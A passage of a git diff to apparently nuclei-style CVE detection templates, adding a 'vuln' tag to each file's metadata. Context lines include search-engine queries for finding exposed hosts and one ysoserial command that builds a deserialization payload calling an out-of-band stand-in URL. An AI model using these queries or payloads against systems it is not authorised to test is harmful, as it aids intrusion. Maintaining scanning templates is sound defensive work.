+23,7 @@ info: max-request: 2 verified: true publicwww-query: "/wp-content/plugins/tatsu/" - tags: cve,cve2021,wp,wp-plugin,wordpress,tatsu,rce,vkev + tags: cve,cve2021,wp,wp-plugin,wordpress,tatsu,rce,vkev,vuln variables: marker: "{{randstr}}" diff --git a/http/cves/2021/CVE-2021-25099.yaml b/http/cves/2021/CVE-2021-25099.yaml index 47669d622fb..8158c6db961 100644 --- a/http/cves/2021/CVE-2021-25099.yaml +++ b/http/cves/2021/CVE-2021-25099.yaml @@ -30,7 +30,7 @@ info: vendor: givewp product: givewp framework: wordpress - tags: cve2021,cve,xss,wp,give,wordpress,wp-plugin,unauth,wpscan,givewp + tags: cve2021,cve,xss,wp,give,wordpress,wp-plugin,unauth,wpscan,givewp,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-25104.yaml b/http/cves/2021/CVE-2021-25104.yaml index 173c798d02e..90fca1b081e 100644 --- a/http/cves/2021/CVE-2021-25104.yaml +++ b/http/cves/2021/CVE-2021-25104.yaml @@ -28,7 +28,7 @@ info: vendor: oceanwp product: ocean_extra framework: wordpress - tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan,wp,ocean-extra,oceanwp + tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan,wp,ocean-extra,oceanwp,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-25111.yaml b/http/cves/2021/CVE-2021-25111.yaml index 956227b1811..368f28be7d2 100644 --- a/http/cves/2021/CVE-2021-25111.yaml +++ b/http/cves/2021/CVE-2021-25111.yaml @@ -26,7 +26,7 @@ info: vendor: english_wordpress_admin_project product: english_wordpress_admin framework: wordpress - tags: cve2021,cve,unauth,wpscan,wp-plugin,redirect,wordpress,wp,english_wordpress_admin_project + tags: cve2021,cve,unauth,wpscan,wp-plugin,redirect,wordpress,wp,english_wordpress_admin_project,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-25112.yaml b/http/cves/2021/CVE-2021-25112.yaml index b173fb7622b..4840743dd62 100644 --- a/http/cves/2021/CVE-2021-25112.yaml +++ b/http/cves/2021/CVE-2021-25112.yaml @@ -28,7 +28,7 @@ info: vendor: i-plugins product: whmcs_bridge framework: wordpress - tags: cve2021,cve,whmcs,xss,wpscan,wordpress,wp-plugin,wp,authenticated,i-plugins + tags: cve2021,cve,whmcs,xss,wpscan,wordpress,wp-plugin,wp,authenticated,i-plugins,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml index 3299c50708c..e9803f8cab0 100644 --- a/http/cves/2021/CVE-2021-25114.yaml +++ b/http/cves/2021/CVE-2021-25114.yaml @@ -34,7 +34,7 @@ info: fofa-query: body=/wp-content/plugins/paid-memberships-pro/ publicwww-query: /wp-content/plugins/paid-memberships-pro/ google-query: inurl:"/wp-content/plugins/paid-memberships-pro" - tags: time-based-sqli,cve2021,cve,wp-plugin,wp,sqli,paid-memberships-pro,wpscan,wordpress,strangerstudios,vkev + tags: time-based-sqli,cve2021,cve,wp-plugin,wp,sqli,paid-memberships-pro,wpscan,wordpress,strangerstudios,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-25118.yaml b/http/cves/2021/CVE-2021-25118.yaml index 84f4ce7b1be..9f925cf602a 100644 --- a/http/cves/2021/CVE-2021-25118.yaml +++ b/http/cves/2021/CVE-2021-25118.yaml @@ -27,7 +27,7 @@ info: vendor: yoast product: yoast_seo framework: wordpress - tags: cve2021,cve,wpscan,wordpress,wp-plugin,fpd,wp,yoast + tags: cve2021,cve,wpscan,wordpress,wp-plugin,fpd,wp,yoast,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-25120.yaml b/http/cves/2021/CVE-2021-25120.yaml index f72868f5fc1..ace17fd55ee 100644 --- a/http/cves/2021/CVE-2021-25120.yaml +++ b/http/cves/2021/CVE-2021-25120.yaml @@ -26,7 +26,7 @@ info: vendor: easysocialfeed product: easy_social_feed framework: wordpress - tags: cve2021,cve,wordpress,wp-plugin,xss,authenticated,wpscan,easysocialfeed + tags: cve2021,cve,wordpress,wp-plugin,xss,authenticated,wpscan,easysocialfeed,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-25161.yaml b/http/cves/2021/CVE-2021-25161.yaml index 56fd7fa40e3..9324e12b0a0 100644 --- a/http/cves/2021/CVE-2021-25161.yaml +++ b/http/cves/2021/CVE-2021-25161.yaml @@ -25,7 +25,7 @@ info: product: aruba-instant-access-point shodan-query: title:"Aruba" fofa-query: body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js" - tags: cve,cve2021,xss,aruba,web + tags: cve,cve2021,xss,aruba,web,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-25281.yaml b/http/cves/2021/CVE-2021-25281.yaml index 0d02e2eb5e1..c9d15ef2597 100644 --- a/http/cves/2021/CVE-2021-25281.yaml +++ b/http/cves/2021/CVE-2021-25281.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: saltstack product: salt - tags: cve,cve2021,saltapi,rce,saltstack,unauth + tags: cve,cve2021,saltapi,rce,saltstack,unauth,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-25296.yaml b/http/cves/2021/CVE-2021-25296.yaml index a871e2c0105..e20505ec324 100644 --- a/http/cves/2021/CVE-2021-25296.yaml +++ b/http/cves/2021/CVE-2021-25296.yaml @@ -36,7 +36,7 @@ info: - title="nagios xi" - app="nagios-xi" google-query: intitle:"nagios xi" - tags: cve,cve2021,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios,vkev + tags: cve,cve2021,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-25297.yaml b/http/cves/2021/CVE-2021-25297.yaml index 98f93e4c220..a22730be984 100644 --- a/http/cves/2021/CVE-2021-25297.yaml +++ b/http/cves/2021/CVE-2021-25297.yaml @@ -36,7 +36,7 @@ info: - title="nagios xi" - app="nagios-xi" google-query: intitle:"nagios xi" - tags: cve2021,cve,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios,vkev + tags: cve2021,cve,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-25298.yaml b/http/cves/2021/CVE-2021-25298.yaml index 18cf4c1c2b0..4c45fce4240 100644 --- a/http/cves/2021/CVE-2021-25298.yaml +++ b/http/cves/2021/CVE-2021-25298.yaml @@ -36,7 +36,7 @@ info: - title="nagios xi" - app="nagios-xi" google-query: intitle:"nagios xi" - tags: cve2021,cve,packetstorm,oast,authenticated,msf,nagiosxi,rce,kev,nagios,vkev + tags: cve2021,cve,packetstorm,oast,authenticated,msf,nagiosxi,rce,kev,nagios,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-25299.yaml b/http/cves/2021/CVE-2021-25299.yaml index 5116c503f33..5d0bad71e22 100644 --- a/http/cves/2021/CVE-2021-25299.yaml +++ b/http/cves/2021/CVE-2021-25299.yaml @@ -34,7 +34,7 @@ info: - title="nagios xi" - app="nagios-xi" google-query: intitle:"nagios xi" - tags: cve2021,cve,nagios,nagiosxi,xss,authenticated + tags: cve2021,cve,nagios,nagiosxi,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-25646.yaml b/http/cves/2021/CVE-2021-25646.yaml index 3c6c4106c36..ee850d5713b 100644 --- a/http/cves/2021/CVE-2021-25646.yaml +++ b/http/cves/2021/CVE-2021-25646.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: apache product: druid - tags: cve2021,cve,apache,rce,druid,vkev + tags: cve2021,cve,apache,rce,druid,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-25864.yaml b/http/cves/2021/CVE-2021-25864.yaml index 0c50ed9151e..a2b08cc0347 100644 --- a/http/cves/2021/CVE-2021-25864.yaml +++ b/http/cves/2021/CVE-2021-25864.yaml @@ -32,7 +32,7 @@ info: - http.title:"node-red" fofa-query: title="node-red" google-query: intitle:"node-red" - tags: cve2021,cve,huemagic,lfi,dgtl,node.js,vkev + tags: cve2021,cve,huemagic,lfi,dgtl,node.js,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml index 2932256d273..a3e22190a50 100644 --- a/http/cves/2021/CVE-2021-25899.yaml +++ b/http/cves/2021/CVE-2021-25899.yaml @@ -31,7 +31,7 @@ info: - html:"AURALL" - http.html:"aurall" fofa-query: body="aurall" - tags: time-based-sqli,cve2021,cve,sqli,void,aurall,vkev + tags: time-based-sqli,cve2021,cve,sqli,void,aurall,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-26072.yaml b/http/cves/2021/CVE-2021-26072.yaml index b2bfa764e4b..94fc6fd8625 100644 --- a/http/cves/2021/CVE-2021-26072.yaml +++ b/http/cves/2021/CVE-2021-26072.yaml @@ -25,7 +25,7 @@ info: vendor: atlassian product: confluence_server shodan-query: http.component:"Atlassian Confluence" - tags: cve,cve2021,confluence,atlassian,ssrf,oast + tags: cve,cve2021,confluence,atlassian,ssrf,oast,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-26084.yaml b/http/cves/2021/CVE-2021-26084.yaml index b8d01b75980..7cc15758336 100644 --- a/http/cves/2021/CVE-2021-26084.yaml +++ b/http/cves/2021/CVE-2021-26084.yaml @@ -31,7 +31,7 @@ info: - http.component:"Atlassian Confluence" - http.component:"atlassian confluence" fofa-query: app="atlassian-confluence" - tags: cve2021,cve,rce,confluence,injection,ognl,kev,atlassian,vkev + tags: cve2021,cve,rce,confluence,injection,ognl,kev,atlassian,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-26085.yaml b/http/cves/2021/CVE-2021-26085.yaml index 76c5c34265e..5b696671c01 100644 --- a/http/cves/2021/CVE-2021-26085.yaml +++ b/http/cves/2021/CVE-2021-26085.yaml @@ -31,7 +31,7 @@ info: - http.component:"Atlassian Confluence" - http.component:"atlassian confluence" fofa-query: app="atlassian-confluence" - tags: cve2021,cve,kev,packetstorm,confluence,atlassian,lfi,intrusive,vkev + tags: cve2021,cve,kev,packetstorm,confluence,atlassian,lfi,intrusive,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-26086.yaml b/http/cves/2021/CVE-2021-26086.yaml index fe0f798e469..14a2fa29663 100644 --- a/http/cves/2021/CVE-2021-26086.yaml +++ b/http/cves/2021/CVE-2021-26086.yaml @@ -30,7 +30,7 @@ info: shodan-query: - http.component:"Atlassian Jira" - http.component:"atlassian jira" - tags: cve2021,cve,lfi,packetstorm,jira,intrusive,atlassian,kev,vkev + tags: cve2021,cve,lfi,packetstorm,jira,intrusive,atlassian,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-26247.yaml b/http/cves/2021/CVE-2021-26247.yaml index 50659feb1f5..9c142bb5070 100644 --- a/http/cves/2021/CVE-2021-26247.yaml +++ b/http/cves/2021/CVE-2021-26247.yaml @@ -37,7 +37,7 @@ info: google-query: - intitle:"cacti" - intitle:"login to cacti" - tags: cve,cve2021,cacti,xss + tags: cve,cve2021,cacti,xss,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-26292.yaml b/http/cves/2021/CVE-2021-26292.yaml index e559eb41536..7f763ee0fbd 100644 --- a/http/cves/2021/CVE-2021-26292.yaml +++ b/http/cves/2021/CVE-2021-26292.yaml @@ -19,7 +19,7 @@ info: fofa-query: - "X-Server: AfterlogicDAVServer" - "x-server: afterlogicdavserver" - tags: cve2021,cve,afterlogic,path,disclosure,AfterLogic + tags: cve2021,cve,afterlogic,path,disclosure,AfterLogic,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-26294.yaml b/http/cves/2021/CVE-2021-26294.yaml index 6e1beeb6e94..0c103870b97 100644 --- a/http/cves/2021/CVE-2021-26294.yaml +++ b/http/cves/2021/CVE-2021-26294.yaml @@ -28,7 +28,7 @@ info: fofa-query: - "X-Server: AfterlogicDAVServer" - "x-server: afterlogicdavserver" - tags: cve2021,cve,afterlogic,exposure,AfterLogic,vkev + tags: cve2021,cve,afterlogic,exposure,AfterLogic,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-26295.yaml b/http/cves/2021/CVE-2021-26295.yaml index 5f2ce290748..faf41e4570e 100644 --- a/http/cves/2021/CVE-2021-26295.yaml +++ b/http/cves/2021/CVE-2021-26295.yaml @@ -38,7 +38,7 @@ info: - body="ofbiz" - app="apache_ofbiz" ysoserial-payload: java -jar ysoserial.jar URLDNS https://oob-url-to-request.tld | hex - tags: cve2021,cve,packetstorm,apache,ofbiz,deserialization,rce,vkev + tags: cve2021,cve,packetstorm,apache,ofbiz,deserialization,rce,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-26475.yaml b/http/cves/2021/CVE-2021-26475.yaml index 9e43a9748e8..e8e5f46c63e 100644 --- a/http/cves/2021/CVE-2021-26475.yaml +++ b/http/cves/2021/CVE-2021-26475.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: eprints product: eprints - tags: cve2021,cve,xss,eprints,intrusive + tags: cve2021,cve,xss,eprints,intrusive,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-26598.yaml b/http/cves/2021/CVE-2021-26598.yaml index 2930ff09e3b..d6b5a1fbdcd 100644 --- a/http/cves/2021/CVE-2021-26598.yaml +++ b/http/cves/2021/CVE-2021-26598.yaml @@ -32,7 +32,7 @@ info: - cpe:"cpe:2.3:a:impresscms:impresscms" - http.html:"impresscms" fofa-query: body="impresscms" - tags: cve,cve2021,hackerone,impresscms,unauth,cms + tags: cve,cve2021,hackerone,impresscms,unauth,cms,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-26599.yaml b/http/cves/2021/CVE-2021-26599.yaml index 77cadf79d51..18e33c926be 100644 --- a/http/cves/2021/CVE-2021-26599.yaml +++ b/http/cves/2021/CVE-2021-26599.yaml @@ -25,7 +25,7 @@ info: product: impresscms shodan-query: http.html:"ImpressCMS" fofa-query: body="ImpressCMS" - tags: cve,cve2021,impresscms,sqli,time-based-sqli + tags: cve,cve2021,impresscms,sqli,time-based-sqli,vuln flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-26702.yaml b/http/cves/2021/CVE-2021-26702.yaml index de17c21bf1b..8d8700a89d1 100644 --- a/http/cves/2021/CVE-2021-26702.yaml +++ b/http/cves/2021/CVE-2021-26702.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: eprints product: eprints - tags: cve2021,cve,xss,eprints + tags: cve2021,cve,xss,eprints,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-26710.yaml b/http/cves/2021/CVE-2021-26710.yaml index 5a84d831c58..5d731e988a0 100644 --- a/http/cves/2021/CVE-2021-26710.yaml +++ b/http/cves/2021/CVE-2021-26710.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: redwood product: report2web - tags: cve2021,cve,redwood,xss + tags: cve2021,cve,redwood,xss,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-26723.yaml b/http/cves/2021/CVE-2021-26723.yaml index 878de43b871..de23e2bffaf 100644 --- a/http/cves/2021/CVE-2021-26723.yaml +++ b/http/cves/2021/CVE-2021-26723.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: jenzabar product: jenzabar - tags: cve2021,cve,packetstorm,jenzabar,xss + tags: cve2021,cve,packetstorm,jenzabar,xss,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-26812.yaml b/http/cves/2021/CVE-2021-26812.yaml index 6e5b7feb3ed..6376225b154 100644 --- a/http/cves/2021/CVE-2021-26812.yaml +++ b/http/cves/2021/CVE-2021-26812.yaml @@ -27,7 +27,7 @@ info: vendor: jitsi product: meet framework: moodle - tags: cve2021,cve,moodle,jitsi,xss,plugin + tags: cve2021,cve,moodle,jitsi,xss,plugin,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-26855.yaml b/http/cves/2021/CVE-2021-26855.yaml index 63c1dfcc89a..9f7a776e675 100644 --- a/http/cves/2021/CVE-2021-26855.yaml +++ b/http/cves/2021/CVE-2021-26855.yaml @@ -35,7 +35,7 @@ info: - title="outlook" - icon_hash=1768726119 google-query: intitle:"outlook" - tags: cve2021,cve,ssrf,rce,exchange,oast,microsoft,kev,vkev + tags: cve2021,cve,ssrf,rce,exchange,oast,microsoft,kev,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-27124.yaml b/http/cves/2021/CVE-2021-27124.yaml index 7dd71659080..687780d5370 100644 --- a/http/cves/2021/CVE-2021-27124.yaml +++ b/http/cves/2021/CVE-2021-27124.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project + tags: cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-27132.yaml b/http/cves/2021/CVE-2021-27132.yaml index 50dd4b0c905..48107ffdff0 100644 --- a/http/cves/2021/CVE-2021-27132.yaml +++ b/http/cves/2021/CVE-2021-27132.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: sercomm product: agcombo_vd625_firmware - tags: cve2021,cve,crlf,injection,sercomm,xss + tags: cve2021,cve,crlf,injection,sercomm,xss,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-27309.yaml b/http/cves/2021/CVE-2021-27309.yaml index 9bde7546126..ae96bd4a866 100644 --- a/http/cves/2021/CVE-2021-27309.yaml +++ b/http/cves/2021/CVE-2021-27309.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: csphere product: clansphere - tags: cve2021,cve,clansphere,xss,cms,unauth,csphere + tags: cve2021,cve,clansphere,xss,cms,unauth,csphere,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-27310.yaml b/http/cves/2021/CVE-2021-27310.yaml index 3b48e4b10c9..46fe72edc06 100644 --- a/http/cves/2021/CVE-2021-27310.yaml +++ b/http/cves/2021/CVE-2021-27310.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: csphere product: clansphere - tags: cve2021,cve,xss,clansphere,csphere + tags: cve2021,cve,xss,clansphere,csphere,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-27314.yaml b/http/cves/2021/CVE-2021-27314.yaml index a489eaaaef1..c3dc65e1c3b 100644 --- a/http/cves/2021/CVE-2021-27314.yaml +++ b/http/cves/2021/CVE-2021-27314.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: time-based-sqli,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project + tags: time-based-sqli,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml index 63cc954558f..c065e1ede6c 100644 --- a/http/cves/2021/CVE-2021-27315.yaml +++ b/http/cves/2021/CVE-2021-27315.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: time-based-sqli,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project + tags: time-based-sqli,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-27316.yaml b/http/cves/2021/CVE-2021-27316.yaml index f52d2a09096..cc8d412414b 100644 --- a/http/cves/2021/CVE-2021-27316.yaml +++ b/http/cves/2021/CVE-2021-27316.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: time-based-sqli,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project + tags: time-based-sqli,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-27319.yaml b/http/cves/2021/CVE-2021-27319.yaml index aaace7615a1..d1aed54183d 100644 --- a/http/cves/2021/CVE-2021-27319.yaml +++ b/http/cves/2021/CVE-2021-27319.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: time-based-sqli,cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project + tags: time-based-sqli,cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-27320.yaml b/http/cves/2021/CVE-2021-27320.yaml index 3dc944cb91d..70d7a7f4e87 100644 --- a/http/cves/2021/CVE-2021-27320.yaml +++ b/http/cves/2021/CVE-2021-27320.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: time-based-sqli,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project + tags: time-based-sqli,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-27330.yaml b/http/cves/2021/CVE-2021-27330.yaml index c99628b5d58..992888e51fb 100644 --- a/http/cves/2021/CVE-2021-27330.yaml +++ b/http/cves/2021/CVE-2021-27330.yaml @@ -34,7 +34,7 @@ info: google-query: - intitle:TriConsole.com - PHP Calendar Date Picker - intitle:triconsole.com - php calendar date picker - tags: cve2021,cve,xss,edb,triconsole + tags: cve2021,cve,xss,edb,triconsole,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-27358.yaml b/http/cves/2021/CVE-2021-27358.yaml index f0985db1456..d5f692443b0 100644 --- a/http/cves/2021/CVE-2021-27358.yaml +++ b/http/cves/2021/CVE-2021-27358.yaml @@ -35,7 +35,7 @@ info: - title="grafana" - app="grafana" google-query: intitle:"grafana" - tags: cve2021,cve,grafana,unauth + tags: cve2021,cve,grafana,unauth,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-27519.yaml b/http/cves/2021/CVE-2021-27519.yaml index 9175fcfe326..ffc54c3ee68 100644 --- a/http/cves/2021/CVE-2021-27519.yaml +++ b/http/cves/2021/CVE-2021-27519.yaml @@ -36,7 +36,7 @@ info: fofa-query: - 'body="powered by: fudforum"' - body="fudforum" - tags: cve2021,cve,xss,fudforum,edb,packetstorm + tags: cve2021,cve,xss,fudforum,edb,packetstorm,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-27520.yaml b/http/cves/2021/CVE-2021-27520.yaml index b1ec91a9573..b9d9baa5f27 100644 --- a/http/cves/2021/CVE-2021-27520.yaml +++ b/http/cves/2021/CVE-2021-27520.yaml @@ -36,7 +36,7 @@ info: fofa-query: - 'body="powered by: fudforum"' - body="fudforum" - tags: cve2021,cve,packetstorm,xss,fuddorum,edb,intrusive,fudforum + tags: cve2021,cve,packetstorm,xss,fuddorum,edb,intrusive,fudforum,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-27561.yaml b/http/cves/2021/CVE-2021-27561.yaml index 17e9b416c2f..e4c58d60740 100644 --- a/http/cves/2021/CVE-2021-27561.yaml +++ b/http/cves/2021/CVE-2021-27561.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: yealink product: device_management - tags: cve2021,cve,rce,yealink,mirai,kev,vkev + tags: cve2021,cve,rce,yealink,mirai,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-27651.yaml b/http/cves/2021/CVE-2021-27651.yaml index 56b257025b1..c6d100faf75 100644 --- a/http/cves/2021/CVE-2021-27651.yaml +++ b/http/cves/2021/CVE-2021-27651.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: pega product: infinity - tags: cve2021,cve,pega,auth-bypass,passive + tags: cve2021,cve,pega,auth-bypass,passive,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-27670.yaml b/http/cves/2021/CVE-2021-27670.yaml index 3edaf8ad12d..84f2b6cc618 100644 --- a/http/cves/2021/CVE-2021-27670.yaml +++ b/http/cves/2021/CVE-2021-27670.yaml @@ -33,7 +33,7 @@ info: - http.title:"appspace" fofa-query: title="appspace" google-query: intitle:"appspace" - tags: cve,cve2021,appspace,ssrf + tags: cve,cve2021,appspace,ssrf,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-27748.yaml b/http/cves/2021/CVE-2021-27748.yaml index db1683ece86..bfc524ab44c 100644 --- a/http/cves/2021/CVE-2021-27748.yaml +++ b/http/cves/2021/CVE-2021-27748.yaml @@ -23,7 +23,7 @@ info: shodan-query: http.html:"IBM WebSphere Portal" product: websphere vendor: ibm - tags: cve2021,cve,hcl,ibm,ssrf,websphere + tags: cve2021,cve,hcl,ibm,ssrf,websphere,vuln flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-27850.yaml b/http/cves/2021/CVE-2021-27850.yaml index e9b5b33e8d1..1fa897cf604 100644 --- a/http/cves/2021/CVE-2021-27850.yaml +++ b/http/cves/2021/CVE-2021-27850.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: apache product: tapestry - tags: cve,cve2021,apache,tapestry,vkev + tags: cve,cve2021,apache,tapestry,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-27856.yaml b/http/cves/2021/CVE-2021-27856.yaml index 8eb205a09cf..f6df1ed64a5 100644 --- a/http/cves/2021/CVE-2021-27856.yaml +++ b/http/cves/2021/CVE-2021-27856.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: fatpipeinc product: warp_firmware - tags: cve,cve2021,fatpipe,default-login,backdoor,auth-bypass,vkev + tags: cve,cve2021,fatpipe,default-login,backdoor,auth-bypass,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-27858.yaml b/http/cves/2021/CVE-2021-27858.yaml index 5ddea2987a1..33cdef809b9 100644 --- a/http/cves/2021/CVE-2021-27858.yaml +++ b/http/cves/2021/CVE-2021-27858.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: fatpipeinc product: warp_firmware - tags: cve,cve2021,fatpipe,auth-bypass,router + tags: cve,cve2021,fatpipe,auth-bypass,router,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-27905.yaml b/http/cves/2021/CVE-2021-27905.yaml index 39e75bdb492..c3b3f727e01 100644 --- a/http/cves/2021/CVE-2021-27905.yaml +++ b/http/cves/2021/CVE-2021-27905.yaml @@ -36,7 +36,7 @@ info: google-query: - intitle:"apache solr" - intitle:"solr admin" - tags: cve2021,cve,apache,solr,ssrf + tags: cve2021,cve,apache,solr,ssrf,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-27909.yaml b/http/cves/2021/CVE-2021-27909.yaml index f2c74725587..8a2af38113d 100644 --- a/http/cves/2021/CVE-2021-27909.yaml +++ b/http/cves/2021/CVE-2021-27909.yaml @@ -32,7 +32,7 @@ info: - http.title:"mautic" fofa-query: title="mautic" google-query: intitle:"mautic" - tags: cve2021,cve,mautic,xss,acquia + tags: cve2021,cve,mautic,xss,acquia,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-27931.yaml b/http/cves/2021/CVE-2021-27931.yaml index ff3eb5f202b..85f42171588 100644 --- a/http/cves/2021/CVE-2021-27931.yaml +++ b/http/cves/2021/CVE-2021-27931.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: lumis product: lumis_experience_platform - tags: cve2021,cve,lumis,xxe,oast,blind,vkev + tags: cve2021,cve,lumis,xxe,oast,blind,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-27964.yaml b/http/cves/2021/CVE-2021-27964.yaml index 79e96fc87e7..5632a134226 100644 --- a/http/cves/2021/CVE-2021-27964.yaml +++ b/http/cves/2021/CVE-2021-27964.yaml @@ -22,7 +22,7 @@ info: product: sonlogger fofa-query: body="SonLogger" max-request: 2 - tags: cve,cve2021,sonlogger,intrusive,vkev + tags: cve,cve2021,sonlogger,intrusive,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-28073.yaml b/http/cves/2021/CVE-2021-28073.yaml index 2a8825647c0..a28f40b852c 100644 --- a/http/cves/2021/CVE-2021-28073.yaml +++ b/http/cves/2021/CVE-2021-28073.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-28073 metadata: max-request: 2 - tags: cve2021,cve,ntopng + tags: cve2021,cve,ntopng,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-28149.yaml b/http/cves/2021/CVE-2021-28149.yaml index 19171106c78..5fea29e874d 100644 --- a/http/cves/2021/CVE-2021-28149.yaml +++ b/http/cves/2021/CVE-2021-28149.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: hongdian product: h8922_firmware - tags: cve2021,cve,hongdian,traversal,vkev + tags: cve2021,cve,hongdian,traversal,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-28150.yaml b/http/cves/2021/CVE-2021-28150.yaml index 45d205512be..654f1da529f 100644 --- a/http/cves/2021/CVE-2021-28150.yaml +++ b/http/cves/2021/CVE-2021-28150.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: hongdian product: h8922_firmware - tags: cve2021,cve,hongdian,exposure,vkev + tags: cve2021,cve,hongdian,exposure,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-28151.yaml b/http/cves/2021/CVE-2021-28151.yaml index 48777c75751..b1d4db60c19 100644 --- a/http/cves/2021/CVE-2021-28151.yaml +++ b/http/cves/2021/CVE-2021-28151.yaml @@ -28,7 +28,7 @@ info: max-request: 2 